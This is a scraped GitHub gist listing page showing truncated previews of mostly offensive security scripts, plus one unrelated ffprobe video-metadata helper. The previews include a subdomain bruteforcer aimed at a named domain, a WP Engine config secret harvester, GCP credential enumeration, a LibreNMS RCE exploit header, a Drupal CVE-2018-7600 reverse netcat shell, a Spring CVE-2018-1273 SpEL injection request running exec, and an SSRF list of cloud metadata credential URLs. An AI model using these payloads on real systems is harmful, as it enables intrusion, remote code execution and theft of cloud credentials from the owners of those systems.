Skip to content

Instantly share code, notes, and snippets.

💭
Hacking!

Robbie random-robbie

💭
Hacking!
Block or report user

Report or block random-robbie

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@marzavec
marzavec / run.js
Created Aug 8, 2019
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
View run.js
/*
Developer: Marzavec ( https://github.com/marzavec )
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline seperated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';
View wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active Oct 1, 2019
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-projet"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
View librenms-exploit.py
#!/usr/bin/python
'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
@fransr
fransr / bucket-disclose.sh
Last active Oct 9, 2019
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
View bucket-disclose.sh
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@g0tmi1k
g0tmi1k / drupalgeddon2_CVE-2018-7600_SA-CORE-2018-002.md
Last active Oct 1, 2019
drupalgeddon2 / SA-CORE-2018-002 / CVE-2018-7600 cURL (PoC)
View drupalgeddon2_CVE-2018-7600_SA-CORE-2018-002.md
@AlbinoDrought
AlbinoDrought / drupal-reverse-shell.sh
Created Apr 12, 2018
Drupal CVE-2018-7600 PoC - reverse netcat shell ;)
View drupal-reverse-shell.sh
#!/bin/sh
YOUR_EXTERNAL_IP="172.16.30.108"
YOUR_NETCAT_PORT="6969"
# Start up a netcat server
# netcat -l 6969
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
View CVE-2018-1273.http
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
@jhaddix
jhaddix / cloud_metadata.txt
Last active Oct 16, 2019 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@oldo
oldo / video-metada-finder.py
Last active Oct 16, 2019
A python function utilising `ffprobe` to find any metadata related to a video file. Examples of what it can find include bitrate, fps, codec details, duration and many more. This gist returns the video height and width as an example.
View video-metada-finder.py
#!/usr/local/bin/python3
import subprocess
import shlex
import json
# function to find the resolution of the input video file
def findVideoMetada(pathToInputVideo):
cmd = "ffprobe -v quiet -print_format json -show_streams"
args = shlex.split(cmd)
args.append(pathToInputVideo)
You can’t perform that action at this time.